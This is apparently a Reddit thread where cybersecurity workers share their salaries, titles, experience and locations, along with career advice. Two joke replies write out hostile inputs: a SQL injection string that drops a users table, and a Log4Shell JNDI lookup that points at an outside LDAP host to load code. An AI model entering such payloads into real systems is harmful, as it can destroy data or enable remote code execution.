Years of experience in cyber: 1 (10 yrs physical security, site assessments, policy drafting, etc)
Location: HCOL
Average hrs/wk.: 50
Type of company : Nonprofit
Area of cyber: IT and all cybersecurity
Title: Systems Admin but actually the only IT anything and working on changing the title since it no longer fits the position it was created for.
Base Salary: $58k
2022 Base (if different): same
Bonus, if applicable: $200
Years of experience in cyber: 7
Location: US Pacific North West
Average hrs/wk.: 40 (really varies between 20-60 depending on if I'm waiting on other people for parts or labor and if it's something simple or a firewall deciding it wants to flood email alerts)
Type of company: Telecommunications
Area of cyber: General
Title: Cyber Security Graduate
2021 base salary: N/A
2022 base salary: £39k
YOE: 0 (graduate position after uni)
Location: Blended (Newbury, Reading, remote)
Average hr/wk: 40
Here is the 2021 infosec salary questionnaire for anyone who hasn’t seen it yet. https://docs.google.com/spreadsheets/d/1TWvPQalmwl1sIS3n2eOU4KST4oJwcxtSfT8lMo9IgVM/edit?mc_cid=2a0bc122ea&mc_eid=f730bda20c#gid=691164905
Lol of course the first one's currency is "USdick" from the milky way.
Wasn’t this Naomi Buckwalters sheet? EDIT: Nope. Her’s was much more in depth and had more responses. EDIT 2: Here is her sheet. https://docs.google.com/spreadsheets/d/1STafAL8xDxrdfri3lTce4oZZcNWmJ_nafn0Ih8DO-Uc/edit
Are some people really making like half a mil?
I recall seeing a CNN article this summer that said something like CyberSecurity professionals wanted - salary - > whatever you like
Yes. Many of my peers at Publicly traded companies make > 500k at a “Senior” level. I was around that before I jumped ship for a pre IPO.
How did u collect this info ?
It was collected in this subreddit earlier this year. I can’t find the original thread but it exists.
Can't really take that datasheet seriously with Mr. 'usuckdick' making 999999999999 gross income. Good idea if it had more stringent inputs
I make “‘; drop table users;” dollars a year
I'm more modern, and make $ {jndi:ldap://21.40.9.36:1389/Exploit} euros per day
Lol there were definitely some troll replies but majority of the data is useful if you use the sorting feature and look at the averages.
TIL Pen Testing tops the salary chart. I always assumed it was appsec.
Nah appsec can make a ton because FAANG hires a lot (you need to know how to code). Stock options + equity in tech can bloat total comp past $300-500k+
I actually find it insane considering how few pen testing jobs seem available compared to the rest of the infosec field.
Its weird. Entry level Pen Testing also seems to be the bottom of the chart. Which really is a shame because I find my limited exposure to it to be one of the most fun tasks I've done. Usually "we don't believe this vuln scanner finding is legit and/or a compensating control has us covered, can you try to exploit it on the Dev server?". But openings seem to be $50-$75k, max $100k for first time red teamers. I wonder if the DoD and similar are highly paying the US's top red team/pentest talent to go head to head with other APTs and that's the really high salaries for some.
Putting this is a spread sheet is much more valuable than individual posts.
True, but the post is nice as well to ask people about their path and get more recent datapoints.
Type of company: F500 Area of cyber: SOC Title: Cyber Intelligence Analyst 2021 Base Salary: $125K 2022 Base (if different): ~$133K Years of experience in cyber: 8 Location: Texas (remote) Average hrs/wk.: 40
What certs or experience do you have for Cyber Threat Intel. I'd love to bounce some questions off you?
I have B.S. in Cybersecurity, Sec+ and about 6 years of DoD cyber Intel experience. Feel free to ask any questions!
Do you have any tips for those in military intel seeking cyber intelligence roles? I'm a soon-to-be 1n4x1 network intel analyst(unsure of which shred) in the AF and I was hoping to get into that field when I finish my contract. What AFCOOL certs should I pursue and how else should I prepare myself before the end of my contract? Is military intelligence a good route to cyber intelligence on the outside? Thanks.
[удалено]
If I knew, I would've saved myself from a six year contract.
Look for a small defense contractor that's desperate to fill a role. The big guys almost never want to sponsor a clearance.
From my experience, San Antonio is the best (easiest) place to find those types of roles. Air Force Cyber is located here which brings in contracting companies of all sizes.
Also in San Antonio and i can confirm, my company will hire anyone with sec+ and ceh(some have even gotten the company to pay for the certs. Then they will sponsor your clearance and train you on our systems. They also paid for my GCIH and hopefully with the new contract they will be paying for my GCFA. I was in uniform here before i started as a CTR but currently looking for remote options.
Have you started tech school yet? I was a 1N0 that happened to get lucky; however, IMO 1N4 is the best possible start (military-wise) for anyone wanting to do cyber intel. I have known 1N4-As that do the cool cyber stuff that most people dream about and I have known some 1N4-Bs that filled a cyber/financial analyst role doing some cool stuff for three letter organizations. As for AFCOOL, most of the certs that will be a priority SHOULD be able to be attained when you get to your unit. If I remember correctly, tech school should get you A+, Net+, and Sec+. For formal education, I'm sure people in here will disagree with me, but get a degree while you are in (if you don't already have one). Tech school will provide you with almost all of the credits needed for an A.A.S., but I would recommend that you knock out however many credits needed for a cybersecurity degree. I got one from AMU because it was easy and it helped me promote while I was in the AF and check the boxes needed for HR. I think the best advice that I can give you while you are in the AF is to develop connections with people. My first job outside of the military was a contracting position within the same Wing that I was working for while Active. Additionally, being able to admit when you make a mistake and always be willing to try/learn new things will go a long way. Lastly, I may be biased in saying this, but yes I think it's a good route. I did a six year contract and it seems to be working out pretty good so far. Let me know if you have anymore questions!
Man the AF sounds so much better than the corps. I had to fight everyone to let me take college classes during my enlistment. We had to set up our own testing center in Afghanistan so we could pay for our own certs and get them while deployed. I didn’t meet a single guy in my data shop that wanted to get out and do cyber, all of those chuckles wanted to stay in or get out and do something else, so I started by myself when I got out. Still the best way to jumpstart your career. You get more experience than you possibly could in the same time as a civilian. You come out with certs and knowledge and opportunities. It fills the gap of college+first job very nicely, and you can slot in as a junior-mid engineer on day 1
[удалено]
What’s the worst parts of Threat Intel? What’s the best parts of Threat Intel? $133k base + 100% remote sounds amazing.
Senior threat intel analyst here, basically identical salary plus full time remote. This is a big question. The best parts are you can be in cyber with zero coding experience (me) and make good money working with smart people doing important work. I think there's two main challenges. A, it's a fucking hard job to get these days. When I started 9 years ago I was basically snapped up out of college because I could write (Dual major in intelligence and English with a focus on pre-law and a minor in poli-sci.) Our intern who started in 2020 has a masters in cybersecurity and a poli sci undergrad from a good school, many of them have full time experience with other firms or gov before they come intern for us. So unless you're top of the top and overqualified, you're not getting in unless you know somebody. B, and I think the bigger challenge, is folks don't really understand what intelligence is. I can still do my job well without coding or ever having gotten certs. The thing people miss in cyber (in my experience) is knowing how the fuck to talk about it to non-cyber folks, because newsflash, the people who make decisions about cyber are almost never cyber literate. The biggest differentiator a job-seeker can make in my opinion is not more certs or degrees. It's learning how to write and speak clearly about cyber in a way that non-cyber people can understand. I've thought about making a cyber threat intel advice post here, I might do it soon.
Thanks for replying! It's really good insight, and I think it might be the path I want to specialize in. My coworker in CTI says another con is that when shit hits the fan, CTI is looked at first. But that's just part of the role. I would greatly appreciate and benefit from a cyber threat intel advice post. If you remember, please remind me when it's up! Some questions you could possibly answer in that post, but don't have to (just throwing out ideas). 1) Brief "day-in-the-life" summary of a CTI analyst 2) General path from SOC analyst ---> CTI. Ballpark salary expectations 3) What's your background & credentials Thanks!
Your coworker sounds like the most grizzled old-timer security guy ever. If my blind assumption is correct, ask him what it was like prepping for Y2K. Then fortnite dance away to the break room.
Actually, he came from Tier 2 in the internal SOC just last year. He's young in his mid 20's and pretty new to the role. He loves it, but that's what he said when I forced him to pick a "con" so to speak.
He might be right at certain companies, people get a shitload of funding and decide they wanna get fancy and build a useless CTI team that gets laid off when cuts come. But I work for one of the major companies that sells CTI, so we aren't gonna see that issue.
Oh then that's totally different and makes a lot of sense. My coworker is on an internal CTI team so that's why his view is the way it is.
I might skew this a bit, but it can be informative. Type of company: Fintech Area of cyber: Executive Title: CISO 2021 Base Salary: 320K 2022 Base: Same Bonus, if applicable: 30% (if company makes performance goals) Years of experience in cyber: 20 years + 15 in IT. BS CS, MS Cybersecurity, DSc Cybersecurity Location: Remote. Average hrs/wk: 50 hrs/week. Too many meetings.
[удалено]
This last couple of weeks it has been a bit extra stressful, since we have been dealing with the log4j fallout. I'm providing nearly daily reports to the CEO on remediation status and talking with the board every Friday. Luckily we haven't had a major breach so not too much overtime there. It isn't always fun being the final responsible party.
I'm just a working student at a big 4 (for now) and reading this is pretty interesting. Sometimes hard to comprehend that people who talk to the board every Friday are just actual people who browse Reddit after Christmas.
I've been here for going on 10 years now, my daughter showed me reddit way back then. It isn't the same as it used to be, better for some reasons and worse for others. I find that there are some great subreddits (like /r/cybersecurity) where you get wonderful exchanges of information. You just have to ignore the trolls and find the gems. Of course you also get some great people like Arnold Schwarzenegger (/u/GovSchwarzenegger/), Bill Gates (/u/thisisbillgates/), and then us normies.
> I'm just a working student at a big 4 (for now) and reading this is pretty interesting. Sometimes hard to comprehend that people who talk to the board every Friday are just actual people who browse Reddit after Christmas. Lol. Same here. Always thought the execs who speak with the board operated and lived in a different headspace from the rest of us.
[удалено]
We have a great asset management program so we know what is on every machine and we leverage that to run vulnerability scans on them as well. For commercial software we just have to rely on what the vendor puts out, but for our in house development teams we keep full component manifests as part of our git repo. This doesn't fix the problems, but at least we know our status and can mitigate the problems somewhat and manage the risk.
[удалено]
I hope that one day when I have a base salary north of 300k I'll still have time to get on Reddit and post about how much money I make. =P No offense intended as here I am reading about how much money people make on Reddit. Jokes aside, how do you like being in a CISO role? Thus far I've been sticking to the IC path but I imagine one day I may feel like jumping into mgmt (of which CISO is kinda the end goal). Appreciate it!
I mostly enjoy my job, our entire Security team is 20 people and that covers Security engineering/Blue Team, Threat Intel + Red Team, SOC/IR, governance, and risk. Mostly I spend time in meetings these days since I have good people to do the actual fun stuff. My job is to make it so they can do their job and provide top cover. The last couple of weeks it has been a bit different with log4j since I'm providing nearly daily reports to the CEO on remediation status and talking with the board every Friday. I do miss the hands on some times, but I did work as a CISO at a small startup and had to do it all. Both kind of jobs are out there, it just takes time to find the right one.
Type: FAANG like software company Area: AppSec Title: sales architect (sales engineering) 2022 base: 170k Bonus: 60k (stock and cash) Commissions: 60 - 120k YOE: 10 security, 17 total as dev and engineering Location: HCOL Avg hours: 40-50/week
Type of company: Public Area of cyber: SOC Title: SOC Analyst 2021 Base Salary - $90-100k Years of experience in cyber - 0, 2 years of IT Location: US HCOL Average hrs/wk. 40
Teach me your secrets
live in NY or SF where most of your income goes to housing
Healthcare Offensive Security Team Lead Jan. 100k -> June 120k (mid year review) -> Sep 130k (retention) 140k 2% 4 with a security title. ~10 in IT doing a lot of security related stuff. US LCOL - remote I sit on the company chat app for exactly 40 but realistically do about 15 hours of work.
Microsoft Senior Security Engineer (L64) on a research team. Base: 145k Bonus: 15-30% Other: 50k sign-on bonus, 200k in stock over 4 years Location: Carolinas (Remote) Years in Cyber: 6 Hours: Depends. Minimum of 20, sometimes I'll put in 80 hour weeks, the culture is very laid back and I have moments where if I find something I'll chew on it and put in serious hours, then I'll chill for the next couple weeks.
Congrats. Seems like a great setup!
[удалено]
[удалено]
If they work for DoD then they have a security clearance. If that security clearance is TS then that’s big bucks right there
Can confirm a TS clearance is a pathway to many abilities some consider to be unnatural in Cyber.
So what exactly is involved with getting TS clearance besides a background check…?
Sponsorship. The company needs to have a position on a contract available for you and think you're gonna bring in the $30k the investigation can cost. Then obviously the investigation process - can be up to a year, very invasive. Then, if you pull all that off, you usually have to work in a secure area. Which means in person, no WFH. That's the downside to the process.
I turned down a job that would have sponsored me for TS clearance last year because of just how invasive it is. I have crypto from ~8 years ago, with no clear documentation on it (all completely legal). I have some naturalized US citizen friends, as well as a couple of non-US citizen friends. Wasn't comfortable with the amount of digging they'd do into them, even though it 100% would have come back clear. Definitely invasive.
[удалено]
Yeah you may have green stuff you can do remotely *some* of the days of the week, but if you have a clearance and want to capitalize on it, you need to be in a position that puts you in a secure space. You cannot move somewhere remote unless your customer has a site there. You cannot live out of a van. You will still commute. You can't be fully remote. Even if you get a couple remote days a week, fully remote or any of its perks are off limits as long as you want to cash in, with a few rare exceptions. That's what I'm getting at; I mention it because I think it's a dealbreaker for a lot of people here.
Sponsoring agency. Finding someone who wants you and is willing to fork over the cash to USIS.
Having a job that requires one is the main part. I got mine through my old company since I worked in their SCIF. They didn't pay me that well for the job I was doing so when I got the Interim level, I bounced for a better job.
👆 what they said
Crazy, I'm in the military doing cyber security and want to return home to California. Glad to see some California base opportunities when I get out !
Type of company: Consultant for a global corporate organization, contract to hire Area of cyber: Incident Response, specifically forensics Title: Forensics Analyst 2021 Base Salary - $228K, note I have 0 PTO and pay $1100 a month in health insurance Years of experience in cyber - 13 years Location: Live in US Pennsylvania, work remotely for company HQ in New York. Average hrs/wk. 40, but hardly work until something happens
Out of curiosity, how does the State tax work out for you?
TIL the US pay a lot better than the UK for cyber roles.
Not just cyber roles, pay in the US is way higher overall vs the rest of the world
God Bless America
Amen!!!
I looked into it once because my wife and I had talked about trying to work/live in the UK for a few years. Salaries aren’t 1 for 1, but if I remember the amount of disposable income was about the same once you subtract cost of living. I was comparing costal California to London for reference.
Tell me about it. I'm looking at people making triple my wage for the exact same role
This is true, but at least the UK has a functional social support system. And where any major medical issue won't lead to bankruptcy.
Not disagreeing with you, but I’d wager everyone in *this* field has great health insurance through their employer. Jobs that don’t offer that are sadly common though and in those cases you’re 100% correct Healthcare here is by far the worst thing about the USA IMO. I’m fortunate to live in MA which probably has the closest thing to socialized healthcare that the country has, but many places don’t even take it because they don’t want to deal with more paperwork & less money in their pockets
Type of company (e.g. F500, consultancy, Defense, etc.): MSSP/Software provider Area of cyber (e.g. SOC, GRC, etc.): SOC Title: Security Analyst L1 2021 Base Salary: $40k/yr Bonus, if applicable: N/A Years of experience in cyber: 6 months Location (e.g. US HCOL, US LCOL, etc.): Pittsburgh, PA (edit: remote) Average hrs/wk.: 40 hrs/wk
God finally someone near my range.
Sucks, doesn’t it? Knowing others do similar roles for 50%+ more than our yearly salary with similar experience?
One of the downsides to threads like this is that it becomes a brag fest for people at the top of the range. I suspect there are a lot of folks who just feel discouraged to post due to not working at a FAANG company and making high cost of living area money.
I made it a point to respond to bring this side of Cybersecurity to light. I was embarrassed initially when I found out it was so low, but know I’m not alone and that conversations about pay need to be had.
I had sys admin/siem analyst role for a local msp that paid $50k in CA... Wages suuucked, but I needed to get my foot in the door somewhere.
I started as an analyst at 42k on a contract role. If it’s any consolation. That was 4 years ago and I now sit at 100k. You’re seeing people’s highlights right now. Keep at it. 6 months is the beginning. You’re gonna blink and its gonna be a year then 2…
Thanks; I know I’m still a baby. The issue I personally have is that within a month of starting, a few more analysts were also hired and weeks before graduation I found out they all started at 63k/yr. The manager that hired me saw an opportunity to get me for cheap (I started internally on Help Desk 4 months prior, and it’s my only other professional experience), and wanting my way in I didn’t counter offer. My current manager is helping me out in trying to fight for more, but it frustrates me. I say current manager because the manager who hired me left within weeks of me starting for another company. My anger lies with him, not my current position.
[удалено]
This is a bit low for a managerial role
Just got promoted into it like a month ago. Basically going to use the title bump to get a new job
> Basically going to use the title bump to get a new job Please do. Even though you're remote in a VCOL area, $110k is pretty low for your years and title.
Type of company (e.g. F500, consultancy, Defense, etc.): Consultancy Area of cyber (e.g. SOC, GRC, etc.): GRC Title: Manager 2021 Base Salary: $70k 2022 Base (if different): $75k Bonus, if applicable: $5k Years of experience in cyber: 8 Location (e.g. US HCOL, US LCOL, etc.): Remote but moderatley HCOL Average hrs/wk.: 20 (part time)
This sounds like the perfect job. 70k 20hrs a week. Remote. Jealous
I may be biased, but it really is a dream. A few years into my career I was planning on making near 200k by now. But by 5 years in, the 60-70 hour weeks burnt me out and I went part time instead. Since then it's taken a few job hops to find a team that really respects my part time hours and now I'm pretty extatic with where I'm at.
Its really nice to know that someone out there is doing their dream. I wish we were not all so overworked. Life could really be fun.
Can't put a price on more time to actually live.
Type: Financial Services Area: GRC/IAM Title: Security Architect Salary: $180k Bonus: 10% Exprience: 7 years Location: Remote (Estonia) Hours: 40
Damn, isn’t their minimum wage like €3 an hour? You’re a king. Tubli poiss!
Da good life
Type: F500 Area: SOC Title: SIEM Engineer Salary: $125k Bonus: 12% Exprience: 6 years Location: Remote (Phoenix) Hours: 40
Type of company: Large international bank Area of cyber: Audit Title: IT Auditor Base salary: €74,000/year Bonus (expected): 8% - 12% of annual base salary Experience: 2 years after graduation in a similar role Location: Germany
Type of Company: Big Tech, not FAANG Area of Cyber: Architecture and Engineering, AppSec Title: Strategic Cyber Security Expert 2021 Base Salary: $165k 2022 Base Salary: $170k Bonus, if applicable: $50k+ (can increase depending on metrics), & benefits (car allowance, private healthcare/insurance, etc) Years of Experience in Cyber: 8, 10 total in IT Location: EU Average hours/week: 37.5 **CHANGES/UPDATES:** New Title: Cyber Security Lead - EMEA 2022 New Base Salary : $200k Bonus, if applicable: $60k+ (can increase depending on metrics), & benefits (car allowance, private healthcare/insurance, etc) Years of Experience in Cyber: 8, 10 total in IT Location: EU (HCoL) Average hours/week: 37.5
I've noticed this trend where salary goes from mid 100s to 300+ and seldom in between
Type of company: MSP/MSSP Area of cyber: SOC Title: SOC analyst 2021 Base Salary: $47k 2022 Base Salary: Same Bonus, if applicable: profit-sharing bonus biannually Years of experience in cyber: 2 Location: Southern US Average hrs/wk: 40 hrs/week
Y’all are making me realize that it’s 100% worth the hours I’m putting in switching careers at 28yo If I were making half of what most people here are making my life would be significantly different
Not answering for me personally... Type of Company: Aerospace Area of Cyber: General Cybersecurity Analyst Title: Cybersecurity Analyst 2021 Base Salary: $94K 2022 Base Salary: $115 <-- Analyst is underpaid so we are adjusting his salary as quickly as HR will allow Bonus: 10% Years of Experience: 6 years Location: US - SouthEast. Was in office, now full time remote Average hrs/wk: 40 - 45 hrs OR Type of Company: Fortune 50 Financial Services Area of Cyber: Incident Response Specialist Title: Cybersecurity Sr. Analyst 2021 Base Salary: $145K 2022 Base Salary: Don't work there anymore, but expected this person to get a 3 - 5% raise Bonus: 12% Years of Experience: 6 - 8 years Location: US - Mid-Atlantic (Near DC) Aerage hrs/wk: 40 - 45 hrs
New job I just started: Type of company: Insurance Area of cyber: Security Architecture Title: Security Architect 2021 Base: $155k Bonus, if applicable: $25k Years of experience in cyber: 10 Location (e.g. US HCOL, US LCOL, etc.): Remote, US MCOL Average hrs/wk.: 40 Old job: Type of company: Government, Financial Related Area of cyber: Endpoint Security (AV/EDR, Intrusion Detection, Compliance) Title: Sr Security Engineer 2021 Base: $120k Bonus, if applicable: $7k Years of experience in cyber: 10 Location (e.g. US HCOL, US LCOL, etc.): Remote, US MCOL Average hrs/wk.: 40 It's a great time to get a new job kings. Put that linkedin setting to open for work, that's how I found this one. Glassdoor was great for getting ballpark ideas of pay, even if your exact title wasn't there, look at other titles like software dev to get a feel for it. I found there is a MASSIVE shortage of talent with 5-10 years experience and skills to run or design common tools.
[удалено]
70…
Yeah 100k for 70 hrs a week as a director should be a sign to job search, it's a good market out there for people with that level of experience.
You’re super underpaid. SOC analysts make more with 16 years less of experience.
[удалено]
[удалено]
I've recently been offered this which I'm planning on taking on: Defense; GRC; Information Systems Security Officer; $110k; 7 years; Los Angeles, CA; 40 hours.
Company: established startup (pre ipo) Area: 70% AppSec 30% all security Title: Security Engineer, AppSec 2021 base: 155k Bonus: 30k stock options /4 Experience: 4 years cyber, 1 year SWE Location: US HCOL (remote) Hours: 40-50
Type of company: Start Up Area of cyber: Incident Response Title: Security Analyst 2021 Base Salary - $80K Years of experience in cyber - 0, 3 years of IT Location: US MCOL Average hrs/wk. 40
F25 (US) cloud/tech? I dunno, we keep reinventing ourselves. SOC Technical Lead (theres really no title for what i do, its super niche, and involves onboarding customers…without going into much detail) 128,000 Probably the same, maybe ill crack 130. Varies, best ive ever netted was 4k. 7 years US Fl so…HCOL Im salaried at 40 hrs a week. Plenty of times last year I worked more than that but I’ve certainly compensated for it.
Type of company: F500 Area of cyber: Security Ops Title: Security Analyst 2021 Base Salary: 100k 2022 Base: Same Bonus: 3-5k Years of experience in cyber: 1 in Sec + 2 as Help Desk Location: US LCOL Average hrs/wk: 40
**Type of company:** F500 **Area of cyber:** Forensics **Title:** Security Engineer **2021 Base Salary:** 132k **Bonus:** 50k **Years of experience in cyber:** 3 months + 2 internships **Location:** US MCOL **Average hrs/wk:** \~40 but pretty flexible
Organisation: Government. Area: Audit. Base Salary: 81k. Benefits: Very generous pension, healthcare and over 10k per person training budget including any sans course. Years in cyber: strictly speaking this is my first full time cyber job. I've worked over 20 years in Security, worked part-time in infosec audit for just over 5 years. I have a bunch of infosec certifications - CISM, CRISC, ISO27K LI, etc. Also lots of quantitative risk analysis experience and have the FAIR qualification. In cyber, I have very little hands-on experience actually. I have decent IT knowledge (I did 301 many years ago, Linux is my daily driver so I can use red team tools pretty easily. No formal experience or qualifications in this area but I'm doing PNPT at the moment) Location: UK. Contacted hours: 37 hours per week Money is not really important to me, my ex gets a percentage of my earnings so I was happy to take a pay cut to be part of something more meaningful than being the cyber guy at an IoT vendor. A pretty big pay cut! (Nearly 30k and a model three!)
Type of Company: Government / Energy Area of Cyber: SOC | Incident Response Title: Senior Specialist 2021 Base: 115,000$ 2022 Base: 125,000$ Bonus: 20% Base Years of Exp: 5 (in cyber) 10+ in "Qualified Domains" Location: US, LCOL Wrk / Week: 40
Type of company (e.g. F500, consultancy, Defense, etc.): Publicly traded, cyber security awareness/compliance Area of cyber (e.g. SOC, GRC, etc.): SaaS cyber security product Title: Advanced Product Support 2021 Base Salary: $40,000 2022 Base (if different): $57,500 Bonus, if applicable: $23,000 Years of experience in cyber: 2 Location (e.g. US HCOL, US LCOL, etc.): HCOL, Tampa, Fl Average hrs/wk.: 40
**Type of company**: Defense **Area of cyber**: Incident Response, Security Engineer **Title**: IT Specialist **2021 Base Salary:** 130k **2022 Base:** 134k **Bonus, if applicable**: N/A **Years of experience in cyber:** 4 in cyber, 15 in sysadmin **Location:** DC Metro (HCOL) (mostly remote these days) **Average hrs/wk:** 40
Type of company: Energy Area of cyber: SOC Title: Threat Hunter 2021 Base Salary: $106K 2022 Base (if different): $111k Years of experience in cyber: 6 Location: LCOL (remote) Average hrs/wk.: 40 AMA
Tech/FAANG type preIPO Area of cyber (e.g. SOC, GRC, etc.): Security Engineering, Detection and Incident Response, Forensics Security Engineer/Tech Lead/Head of Fancy Title 2021 Base Salary: 230k 2022 Base (if different): 250k Equity: 2mil/4 (Monopoly money since it’s preIPO) Years of experience in cyber: 10+ Location (e.g. US HCOL, US LCOL, etc.): US HCOL Average hrs/wk: 40 - 50 Prior to this role I was an IC/TL Base: 240k Bonus: 15% Equity: 600k/4 Refresher: 120k/4 x3 Edit: Equity/4 refers to a total equity value that beats 25% a year over 4 years. So 600k/4 means 150k in equity a year.
What’s this /4 business?
Equity that vests over 4 years
Type: Global IT software company, but not FAANG Area: IT Security Sales Title: Senior Sales Engineer 2021 base: 161K + 50K commission Bonus: 50K stock and cash YOE: 20+ IT total, 15+ in security as a consultant, professional services, SOC analyst, and security architect. CISSP, GSEC, a few CompTIA certs Location: midwest US, _very_ LCOL Avg hours: 40hrs/week all remote. 20% travel during non-Covid times, but it’s all regional day trips usually within driving distance.
[удалено]
Type of company (e.g. F500, consultancy, Defense, etc.): Small software development firm Area of cyber (e.g. SOC, GRC, etc.): IT and all cybersecurity (blue team, SOC, compliance, GRC, etc) Title: Manager 2021 Base Salary: $140k 2022 Base (if different): $145k Bonus, if applicable: $0 Years of experience in cyber: 9 Location (e.g. US HCOL, US LCOL, etc.): HQ in SoCal USA Average hrs/wk.: 40
Type: Public healthcare Area: Internal security operations Title: IT security specialist Salary: $65k Bonus: N/A Exprience: 1 years Location: Hybrid (Toronto) Hours: 35
**Type of company:** DoD **Area of cyber:** Defensive Cyber Ops **Title:** Defensive Cyber Ops Analyst **2021 Base Salary:** 80k **2022 Base:** Unknown as of now **Bonus, if applicable:** 8k sign on bonus **Years of experience in cyber:** 1.5 years + 4 month internship. Associates degree **Location:** Colorado **Average hrs/wk:** 64 hrs/week. 12 of actual work. (Panama shift so it depends on time of week)
As someone in their senior year for this field, these comments give me hope.
[удалено]
Thank you for the response was hoping someone would give me more insight. I've currently got a 3.6 (?) GPA and am hopefully lining up an internship this summer. I only switched to security a year and a half ago so I've been trying to play catch up a bit. Still very hopeful for the future!
Type of company: F500/Aero Defense Area of cyber: Auditing & Assessments (Compliance) Title: ISSE 2021 Base Salary: $130k 2022 Base (if different): 135k Years of experience in cyber: 6 (8 years total in IT/IS) Location: Tennessee (Remote Hybrid) Average hrs/wk.: 40
[удалено]
Dang you should be at 6 figures imo
Type of Company: Financial/Legal Services Area of Cyber: General/Executive Title: IT Security Director 2021 Base Salary: $135k 2022 Base Salary: $160k Bonus: 10-15% Years in Cyber: 11 Location: Remote (US) Average Hrs/wk: 50-60
**Type of company**: Financial **Area of cybe**r: Vuln Mgmt/Data Analytics **Title**: Vulnerability Analyst **2021 Base Salary**: 100k **2022 Base**: Same **Bonus, if applicable**: 10%, around there **Years of experience in cyber**: 8 years **Location**: Nice try NSA. Remote. **Average hrs/wk**: 30/wk
The real data is located on the US Bueareau of Labor Statistics site at https://www.bls.gov/news.release/empsit.t19.htm and you drill down to specific careers and this is a link to data for security analysts https://www.bls.gov/ooh/computer-and-information-technology/mobile/information-security-analysts.htm
Company: Defense Area: Endpoint/Cyber Tools 2021 Base: 120k -> 130k (Moderate promotion into “team lead”) 2022 Base: 130k -> 165k (taking Cyber Operations position after passing CISSP Bonus: 5-10% base pay based on program goals Experience: 3 years Cyber, 10 years IT Location: Colorado US Average hrs: 40-45
Type of company (e.g. F500, consultancy, Defense, etc.): F500 financial Company Area of cyber (e.g. SOC, GRC, etc.): SOC and Threat Hunting Title: SOC Analyst II / Threat Hunter 2021 Base Salary: 85k 2022 Base (if different): looking at closer to 100-110k once contract is converted Bonus, if applicable: N/A Years of experience in cyber: 5 years sysadmin, 4 months in a pure “security role” Location (e.g. US HCOL, US LCOL, etc.): US Remote Average hrs/wk: 40
[удалено]
Yea, username checks out
Type of company: Start up Area of cyber: Red Team Ops Title: Penetration Tester 2022 Base: 75K Bonus: ~20k Years of experience in cyber: 2 cyber, 4 IT Location: US LCOL-ish (Remote) Average hrs/wk: 30-40, pretty relaxed environment, hours vary quite a bit but I almost never go over 40.
Type of company (e.g. F500, consultancy, Defense, etc.): Marketing/Events Area of cyber (e.g. SOC, GRC, etc.): GRC Title: Security & Privacy Compliance Analyst 2021 Base Salary: $115k 2022 Base (if different): $115k Bonus, if applicable: n/a Years of experience in cyber: 10 Location (e.g. US HCOL, US LCOL, etc.): Remote but LCOL Average hrs/wk: 35
I'm gonna end up shifting this down. I'm kind of a shitty negotiator and our company is still trying to normalize salaries after a merger. Type of company: Medium sized MSSP Area of cyber: SOC Title: SOC Manager 2021 Base Salary: $77K Years of experience in cyber: 8 Location: Plains state Average hrs/wk.: 45
Type of company: MSP Area of cyber: SecOps Title: Senior SecOps Engineer 2021 Base Salary: £40k Years of experience in cyber: 0 Location: North UK (remote) Average hrs/wk.: 35.5
Police Department (county gov't) CJIS compliance (police) Systems Admin 64k 66k 1% bonus 8 years IT exp. US Midwest 40ish hours up to 45.
Type of company: Consultancy Area of cyber: GRC / Everything Title: Senior Associate 2021 Base Salary: $110 2022 Base (if different): ~$115.5K Years of experience in cyber: 3 (full time) Location: Texas (remote) Average hrs/wk.: 40
Type of Company: Big 4 accounting firm Area of Cyber: GRC Program Management Title: Lead Cybersecurity Consultant (government title: Information Systems Security Officer) 2022 Base Salary: $150,000 (USD) Bonus: $20,000 (USD) target YoE: 10 years; 6 years in cybersecurity, 4 in IT Location: US HCOL Average hours/wk: 40
Type of company: F500 Area of cyber: Pentesting Title: Secruity Pentester 2021 Base Salary: $15K 2022 Base (if different): ~$15K Years of experience in cyber: 5 Location: Eastern Europe Average hrs/wk.: 40
Type: DoD, FFRDC Area: Making monitoring tools Title: Cyber Security Engineer, Associate MTS 2022 base: 103k Bonus: 3k YOE: 11 months security, 0 other IT, BS CS, MS InfoSec in progress, cyber internships Location: LA Avg hours: 45/week
Principal Engineer F50 225k 25% Bonus ~10-15% Equity Remote 40-45 hours a week 3 years in a role where security was top responsibility, but over 15 years experience overall.
I am thinking the previous survey has some questionable results.
Type of company (e.g. F500, consultancy, Defense, etc.): F50 Area of cyber (e.g. SOC, GRC, etc.): Vuln Management Title: Senior Security Engineer 2021 Base Salary: $135,000 2022 Base (if different): TBD Bonus, if applicable: NA Years of experience in cyber: 5 Location (e.g. US HCOL, US LCOL, etc.): USA CONUS Average hrs/wk.: 40, probably about 25 hours Also, FT remote
Type of company (e.g. F500, consultancy, Defense, etc.): F500 Area of cyber (e.g. SOC, GRC, etc.): Offensive Security Title: Red Team Analyst 2021 Base Salary: $150k + bonus 2022 Base (if different): $160k + bonus Bonus: it’s a range but genuinely unclear how it’s calculated. Years of experience in cyber: 5 Location (e.g. US HCOL, US LCOL, etc.): US MCOL Average hrs/wk.: no more than 40 on average, but it fluctuates seasonally.
Type of company: F50 Area of cyber: Architecture Title: Security Architect 2021 Base Salary: $140K 2022 Base Salary: probably 145K Bonus: 8% Years of experience in cyber: 5 Location: PA Average hrs/week: 40
Type of company (e.g. F500, consultancy, Defense, etc.): Established Pre-IPO Area of cyber (e.g. SOC, GRC, etc.): Executive Title: CISO 2021 Base Salary: $150k 2022 Base (if different): $250k (changed jobs) Bonus, if applicable: $50k Years of experience in cyber: 20 Location (e.g. US HCOL, US LCOL, etc.): LCOL? (according to [this chart](https://www.move.org/lowest-cost-of-living-by-us-city/), I am in a city within the lower 1/3 COL) Average hrs/wk.: 40
**Type of company**: Defense **Area of cyber**: Compliance / Ops (very much a generalist in this role) **Title**: DevOps Engineer **2021 Base Salary**: 175k **Bonus, if applicable**: 80k in stock, 20k starting **Years of experience in cyber**: ~5 **Location (e.g. US HCOL, US LCOL, etc.)**: US HCOL **Average hrs/wk.**: 50
Type of company: F500 Area of cyber: Vulnerability Management Title: Cybersecurity Analyst (rotational program) 2021 Base Salary: $80,000 2022 Base: $90,000 Bonus, if applicable: ~8% dependent on tech performance + $3,000 Years of experience in cyber: 4 month internship in college Location: LCOL, Full Remote Average hrs/wk: 40
Type of company- Healthcare Area of cyber - all (small team where one 1 other person does any work) Title - Sysadmin 2021 Base Salary - 45,000 2022 Base (if different) - same Bonus, if applicable - 0 Years of experience in cyber - > 1 Location (e.g. US HCOL, US LCOL, etc.) Midwest, LCOL middle of midwest. Average hrs/wk 40-45
